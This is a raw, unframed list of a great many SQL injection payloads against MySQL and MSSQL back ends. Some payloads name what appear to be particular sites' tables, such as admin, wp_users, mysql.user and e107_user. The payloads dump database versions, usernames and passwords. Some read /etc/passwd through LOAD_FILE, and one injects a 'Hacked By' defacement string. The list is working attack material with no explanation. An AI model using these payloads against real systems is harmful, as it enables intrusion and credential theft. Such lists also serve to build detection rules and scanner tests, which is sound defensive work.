1,2,3,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -227' union select 1,2,id_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin -- -227 union select concat_ws(0x3a ,user(),database(),version()),2,3,4,5,6 from users-- -22813 union select 1,2,user(),4,5,6,7,8,9,10,11/* -2282 union select 1,group_concat(username,char(58),password separator '
'),3,4,5,6,7 from e360.users -- 2283 AND 1=0 UNION SELECT concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7 -- -22861 union all select 1,2,3,4,5,6,7,8,group_concat(login,0x3a,pass),10,database(),user(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from sys_users-- -22861 union all select 1,2,3,4,5,6,7,8,version(),10,database(),user(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -228659 union select 1,concat_ws(0x3a3a,email,password,name,pwd),3,4,5,6,7,8,9,10 from user -- 2286 and 1=0 union select 1,2,group_concat(user(),0x3a,version(),database()),4,5,6,7,8,9,10,11,12,13-- 228 AND ASCII(SUBSTRING((select y=1..3()),1,1))=x=1..3-- 228 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11 limit 1,1/* -228 union select 1,concat(username,1,password),3,4 from login/* -228 UNION SELECT 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9/* 2290000000 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a ,user(),database(),version()),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53-- -2290 or(1,1)=(select count(0),concat((select concat(email,char(58),password) from ciab_member limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -22912) union select 1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* 22-999.9 union select concat_ws(0x3a,version(),user(),database()),2-- -229 uni0n select concat(password,0x3a,user) from mysql.user limit 0,1/* -229' union select 1 -- -229 UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17/* -229 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -229 union select 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12 from Admin_Users -- 229 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 limit 1,1/* -229 union select concat_ws(0x3a,version(),database(),useR()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86-- -229 union select group_concat(version(),0x3a,user(),0x3a,database())-- 22 and 1=0 union select 1,2,0x4861636b6564204279204f7373747564696f212121,version(),5,database(),7-- 22 and 1=0 union Select 1,2,3,4,concat_ws(0x3a,login,pass),6,7 from user limit 0,1 -- 22' aNd 1=0 UNION SELECT 1,2,3,version(),5 -- 22 and 1=0 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7 from user-- 22 and 1=IF(ASCII(SUBSTRING((SELECT version()),1,1))=52,1,0) 22 and 1=@@version-- 22 and mid(version(),1,1)=5 22 AND SUBSTRING((y()),1,1)=x/* 22 limit 0 union select 1,2,concat_ws(char(58),username,password),4 from itc.users limit 1,1/* 22 union all select 1,2,3,4-- -22 union select 0,1,concat_ws(0x3a,username,password,id),3 from utenti-- 22 union select 0,concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* -22 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 -- 22 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- -22 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password) from administrator-- -22 union select 1,2,3,4,5,6,7,8,9,10,11,12 from users/* -22 union select 1,2,3,4,5,6,7,8,group_concat(user,char(58),password,0x3c62723e),10,11,12,13,14,15,16,17,18 from mysql.user -- 22) union select 1,2,3,4,5,6,concat_ws(0x3a,database(),user(),version()),8,9,10,11,12/* -22 union select 1,2,3,4,5,6,group_concat(version(),0x3c62723e,user(),0x3c62723e,database()),8,9,10,11,12 -- -22 union/**/select 1,2,3,4,5,6,user(),8-- 22 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9 -22 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,user(),version(),database()))),7,8,9,10,11,12,13,14,15,16,1,18,19,20,21,22,23 -- -22 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11 from sam_users/* -22 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16-- -2.2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12 from information_schema.tables -- -22 union select 1,2,3,4,user(),6,7 -22 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6-- -22 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7-- -22 union select 1,2,3,concat_ws(char(58),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15/* -22 union select 1,2,3,table_name,5,6,7,8,9 from information_schema.tables/* -22 union select 1,2,3,user(),5,6,7,8,9-- -22 union select 1,2,,4,5,6 from customer/* -22' union select 1,2,aes_decrypt(aes_encrypt(concat(version(),0x3a,user()),0x71),0x71),4 from news/* -22 union select 1,2,concat_ws(0x3a,login,password),4 from auth-- -22 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -22 union select 1,2,concat_ws(0x3a,user_login,user_password,user_email),4,5 from cls_users limit 1,1/* -22 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os,@@tmpdir,@@datadir),4-- -22 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4-- -22 union select 1,2,password,username from users/* -22 union select 1,2,user(),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 -- -22 union select 1,2,version(),4,5/* 22 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from mysql.user limit 1,1/* -22 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -22 union select 1,concat(database(),char(59),version(),char(59),user()) -- -22 union select 1,concat(user,0x3a,password) from mysql.user/* -22 union select 1,concat(user(),char(58),database(),char(58),version()),3,5,6,7,8,9,10,11/* 22' union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password),4,5,6,7,8 from cfy_users-- -22' union select 1,concat_ws(0x2e,user(),version(),database()),3,4,5 from admin -- 22 union select 1,concat_ws(0x3A3a,user(),version(),database()),3,4,5/* -22 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7-- -22 union select 1,concat_ws(0x3a,version(),database(),user()),3-- -22 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/* -22 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),3,4,5,6,7,8-- -22 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5/* -22 union select 1,LOAD_FILE(0x2f6574632f706173737764),3,4/* 22' union select 1,table_name,3,4,5 from information_schema.tables limit 100-- 22 union select 1,user(),version(),4,5,6/* -22 union select 1,version(),3,database(),5,6,7,8,9,10/* -22 union select admin,password,nick,4,5 from users limit 1,1 -22 union select concat_ws(0x3a,version(),@@version_compile_os,user()) ,2,3,4-- 2 -2 union select convert(version() using latin1),2/* -22 union select group_concat(0x0b,table_name),2 from information_schema.tables-- 22 union select login,pass from AdminUsers %22 union select null,null,null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null,null,null,null,null,null,null from e107_user where user_id=1-- -22 UnIoN SeLecT username from user -- -22 union select version(),user()/* 23000' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -23047 and 1=2 union select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7-- -2306 union select group_concat(0x3a,password,login),2,3,4 from admins-- 2309 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5-- 230' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13 limit 1,1/* -230 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14/* 230 union select 1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables limit 1,1-- 230 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6 limit 1,1 -230' union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14 -- -230 union select 1,2,login,4,email,6,7,8,9,user(),11,12,13,14,15 from 1class_admin-- -230 union select 1,2,unhex(hex(version())),4,5,6-- -230 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -230/**/union/**/select 1,VERSION(),3,4/* 230 union select 2,2,3,4,login,6,7,8,9,10,11 from users/* -2310 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4/* -2310 union select 1,concat_ws(version(),user(),database()),3-- -231237 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 23133 union select 1,2,3,4,concat_ws(0x3a3a,user_name,password) from adminUser -- -2317 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/* -2317 union select concat(uname,0x3a,pass) from users limit *,1 23185 union select 1,2,3,4,5,concat(user,char(58),password),7,8,9,10 from mysql.user/* -231 UNION SELECT 1,2,3,4,5,concat(id,0x3a,name,0x3a,pass,0x3a,email),7,8 from users/* -23_1 UNion Select user(),222,database(),444 -- 23212 union select 1,2,3,4,5,6,7,login,9,10 from users limit 2,1/* 23212 union select 1,2,3,4,5,6,7,password,9,10 from users/* -23230 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables -- 232604 union select 1,password,USER(),DATABASE(),5,VERSION(),7,8,9,10 from users/* -232 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13-- 23329 and 1=0 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3/* 2334 or 1=(SELECT TOP 1 cast(LOGINS as nvarchar) ':' cast(PASSWORD as nvarchar) ':' cast(MAIL as nvarchar) from RSI_LOGINS where Id=1)-- 233' aNd 1=0 UNION SELECT 1,2,version(),4,5,6,7,8,9 -- 233 and (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2 limit 1)a) -233' UniOn sElEct 1,2,3,4,5,6,7,8,9,10,11 from admin -- -233 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13-- 233 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1 -233 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7-- -23412 union select concat(username,char(58),password) from users/* -23427 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,concat_ws(0x3a,version(),user(),database()),39,40,41,42,43,44,45,46,47,48,49,50,51,52-- -2342 union select 1,2,group_concat(email,char(58),password,0x3c62723e),4,5,6,7,8,9,10 from cms_user -- 2345432 union select 0,pass,2,3,4,5,6,name from admin -2345 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5/* -23468' union select user(),version(),database()/* 2349' union select 1,version(),3,4,5,6,7,8,9,0,1,2/* 234 and 1=0 union select 1,2,3,version(),5,6,7 -- -234 union -234 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,unhex(hex(load_file(0x2f6574632f706173737764))),6,7,8,9,0,1,2,3,4,5,6,47 from mysql.user/* -234 union select 1,2,concat_ws(0x3a3a,database(),version()),4,5,6,7,8 from mysql.user /* -2356 union select version(),2,3,4,5,6,7,8,9,10 -- 235 and 1=0 union select 1,2,3,4,5,6,7,8,concat(name,0x3a,pass),0,1,2,3,4,5 from users-- 235 and lower(ascii(substring(user(),1,1)))=114 235 union select 0,1,2,3,4,5,column_name from uprava_org.razdels/* -235 union select 1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9 -- -23618 union select 1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4,5,6-- -2361 union select 1,2,3,4,concat_Ws(0x3a3a,nr,email,name,pw),6 from user -- -2362 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11 -23638 union select concat(convert(version() using cp1251),char(59),database(),char(59),user())/* -23638 union select convert(concat_ws(0x3b,user(),database(),version()) using cp1251)/* 23698 and((ascii(substring(user(),1,1)))>1) 236 union select 1,2,3,4,5,concat(version(),0x3a,database(),0x3a,user()),7,8,9,10,11/* -236 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -236' union select 1,2,group_concat(table_name),user(),5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where column_name like 0x257061737325 -- -2378 union select 1,concat_ws(0x3A,user(),@@version,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -237' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,0,1,2,3,4,5,6/* -237 union select 1,2,concat(login,0x3a,pass),4,5,6,7 from users/* -237 union select 1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4,5,6,7,8-- -238 union select 1,2,3,4,version(),6,user(),8,9,10,11,12,13,14,15 -- -238 union select 1,2,3,concat_ws(0x3a3a,aid,name,pwd),5,6 from authors limit 2,1 -- -238 union select 1,2,3,group_concat(users_name,0x3a,users_password),5,6,7,8,9,10,11,12,13 from gs_users-- -238 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11 from administrators-- 238 union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=0x737570657261646d696e 238 union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=0x7573657273-- -238 union select concat_ws(0x3a,id,login,pass) from superadmin-- -238 union select concat_ws(0x3a,uid,site_name,link,pass) from users limit 11,1-- -238 union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 30,1-- 2390 union select 1,2,3,4,5,6,7,8,9,10,11,cast(concat_ws(0x3a,user(),version(),database()) as binary),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -2398 union select 1,table_schema,3,4,5,6,7,8,9,10 from information_schema.columns where table_name=CHAR(98,95,117,115,101,114,115) 2399999 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.tables-- 23-999.9 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10,11,12,13-- 239 and 1=0 UNION SELECT 1,2,login,4,5 from users/* 23.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19 -- 239 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,database(),0x3a,user()),14,15,16,17,18,19,20 limit 1,1/* 239 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20 limit 1,1/* 239 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),8,9,0,1,2-- -239 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -239 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8-- -239 union select 1,convert(version() using latin1),3 239 union select 1,group_concat(table_name),3,4 from information_schema.tables-- 239 union select 1,version(),3,4,5,6,7,8,9/* 23 and 1=0 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 23 and 1=0 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,0,1-- 23 and 1=0 union select 1,group_concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9 from wp_users-- 23 and 1=2 union all select 1,concat(userid,char(58),password),3,null,null,null,null,null from users/* -23 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -23 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- -23 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/* 23' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19,20 from information_schema.tables/* -23 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),10,11,12,13,14,15,16,17,18,19 from solar_user limit 0,1/* -23 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),@@version_compile_os),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 -- -23 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8 -23 union select 1,2,3,4,5,concat_ws(0x3a,id,name,password,email,status),7 from wingate_users limit 0,1-- -23 union select 1,2,3,4,5,group_concat(table_name separator 0x3a),7,8,9 from information_schema.tables where table_schema=0x64625f647573736d616e6e31-- -23 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8 -23 union select 1,2,3,column_name,5,6 from INFORMATION_SCHEMA.columns where table_name=0x70746b6f6d5f61646d limit 1,1-- 23 union select 1,2,3,concat(0x2a,user(),version(),database()),5,6,7,8,9 limit 1,1 -23 union select 1,2,3,concat(username,0x20,lastname,0x20,permissions),5,6,7,8,9,10,11 from admins-- -23 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os) -23 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7 -23 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13-- -23 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -23 union select 1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME) SEPARATOR 0x3C62723E) from information_schema.columns where column_name like 0x257061737325 or column_name like 0x25702577256425-- -23 union select 1,2,3,group_concat(name,0x3a,username,0x3a,password,0x3a,access_levels),5,6,7,8,9,10 from manage_admins where access_levels=0x416c6c-- -23 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6-- -23 union select 1,2,concat_ws(0x3a,table_name,table_schema,version(),database()),4 from information_schema.tables -23 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9/* -23 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -23 union select 1,2,group_concat(user_username,0x3a,user_password,0x0b),4,5,6 from user/* -23 union select 1,2,SQL,4,5,6,7,8,9,10,11-- -23 union select 1,2,user(),version(),database(),6,7/* -23 union select 1,concat(column_name,char(58),table_name),3,4 from information_schema.columns/* -23 union select 1,concat(login,0x2a,password),3,4,5 from auth -23 union select 1,concat_ws(0x3a3a3a,database(),version(),0x3a3a3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -23 union select 1,concat_ws(0x3a,id,username,password),3,4 from users limit 0,1-- -23 union select 1,concat_ws(0x3a,user(),database(),version())-- -23 union select 1,concat_ws(@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9 -- 23 UNION SELECT 1,convert(concat_ws(0x3a,version(),database(),user(),@@version_compile_os) using latin1),3,4,5-- -23 union select 1,fi_profile_password,fi_profile_login,4,count(*),6,7,8,9 from cryptozo_db.ctable_profile-- -23 union select 1,group_concat(0x3a,login,password),3,4 from admins-- -23 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=char(107,105,100,95,115,116,97,102,102) -- -23 union select 1,version(),3,4 -- -23 union select 1,version(),database(),user(),5,6,7-- -23 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5-- 23 union select concat_ws(0x3a,user_name,password),2,3,4,5 from system_users-- -23 union select concat_ws(0x3a,version(),database())-- -23' union select version() from news/* 24/**/ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 2405 union select 1,2,3,4,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),6,7,8-- -2408 union select 1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14 from users/ 2409 and 1=0 union select 0,version(),2,3,4,5,6 -240 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/* -240 UNION SELECT 1,2,3,user(),version(),d*t*b*se(),7,8,9 241 and ascii(lower(substring((selectversion()frominformation_schema.tableslimit0,1),1,1)))=53 241 AND ascii(lower(substring(version(),1,1)))=53 -- -241 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26666,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,user(),version(),database()),40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 -- -241 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables-- -241 union select 1,2,concat_ws(0x203a20,table_schema,table_name,column_name),4,5,6,7,8,9 from information_schema.columns/* -241 union select user(),database(),3,4,5,6,7,8,version()/* -2420 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,user()-- 2422 union select concat_ws(0x3a,emailadd,cpwd,acc_crdt,0x2e) from customer/* 2422 union select table_name from information_schema.tables/* -2423' union select 1,2,3,concat_ws(0x3A3a,id,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from users/* -24240 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 from mysql.user -- -2427 UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10 -- 2428 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,file_priv,10,11,12,13,14,15,16 from mysql.user where user='root'-- 2428 UnIon selECt 1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16-- 2428 UnIon selECt 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16-- -242 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14-- 242 union select 1,2,3,4,5,6 from "table" -242 union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12/* -242 union select 1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -242 union select 1,2,3,concat(version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -242 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -242 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8-- 242 union select null,pass,null,44444,null,null,null,null,null,null,null,null from members where id=33 2432 union select 1,2,3,4,concat_ws(0x3a,unhex(hex(version())),unhex(hex(user())),unhex(hex(database()))) from information_schema.tables-- 2434 limit 0 UnIon(SelecT 1,coNcaT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26) -- -2435 UNION select 1,2,3 from user/* 24377777777777 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/users/**/limit/**/2,1/* -243' UNION SELECT 0,1,2,3,4,concat_ws(0x0b,user(),database(),version()),6,7 -- -243 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -243 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5 2443 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.columns where table_name=0x75736572 -- 2444 union select 1,TABLE_NAME,3,4,5 from INFORMATION_SCHEMA.TABLES limit 61,1/* -2446 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16 -- 244 union select 1,2,3,concat(version(),database(),user()) limit 1,1 -244 union select 1,2,3,concat_ws(char(58),user(),database(),version()),5,6,7,8,9,10,11,12 from mysql.user/* -244 union select 1,2,3,version(),5 from information_schema.tables -- -244 union select 1,2,concat_ws(0x3b,database(),version(),user()),4-- -244 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 2450' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* -2451 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14 -- -2452 union select 1,2,3,concat_ws(0x3a,name,pass),5,6,7,8 from neo_auth limit 49,1/* -2456 union select 1,2,3,4,concat_ws(0x3a,uname,pass),6,7,8,9,10,11 from nuke_users -245 UnIon selECt 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables-- -245 union select 1,2,3,user(),database(),version(),7,8/* -245' union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4-- -245 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14 from "table" 2465) or 1=(select top 1 table_name from information_schema.tables where table_name not in ('NastrSet','NastrPhones','NastrList','TV_Program','Users_contacts','Accessuars','accessuars_name','Hard','AllBase','History_Archive','AllPhone','Archive','Black_List','City','Instr','Constants','sessions','Credits','sessions_keys','Disp_Right','Glossary','TV_Picture','GuestBook','History','Jurnal','TV_Mistake','Jurnal_CFG','TV_Announce','Pictures','Mailer','Statii','Mailer_Log','Mistakes','Money','Sotovik_Err','Digital_Tech','Operators','Pagers','Phones_S','RestrictedPhones','TreeList','Raiting_Model','Raiting_Model_List','Right_List','dtproperties','Subject','OperatorsGSM','temp_archive','listcity','Users_list','Subject_Site','Nastr','FastOff','city_codes','TV_Announce_buf','ForbiddenPhones','codes_city','tv_temp','TV_Kanal','Statii_Rub','stoplist','Phones_from_IRR')) -- 2465) OR 1=@@version -- -2466 union select version(),2,3,4,5,6,7,8-- 2467' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin limit 1,1/* -246 and 1=0 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8-- 246' aNd 1=0 UNION SELECT 1,2,version() -- -246 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10 -- -246 union select 1,2,3,concat_ws(0x3a,id,user,pass,email),5 from faqAdmin -- -246 union select 1,2,concat_ws(0x3a,id,username,password,name),4,5,6 from users limit 0,1/* -2470 union select 1,concat_ws(0x3a3a,login,pass),3,4,5,6 from cms_admin /* 247777 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),version(),database()),16/* -24789 union select 1,2,3,4,user(),database(),version(),8,9,10,11,12,13,14,15,16,17-- 247' and 1=1 union all select 1,2,3,4,5,concat(username,char(58),passwort),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from az_user/* -247 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),useR()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 -247 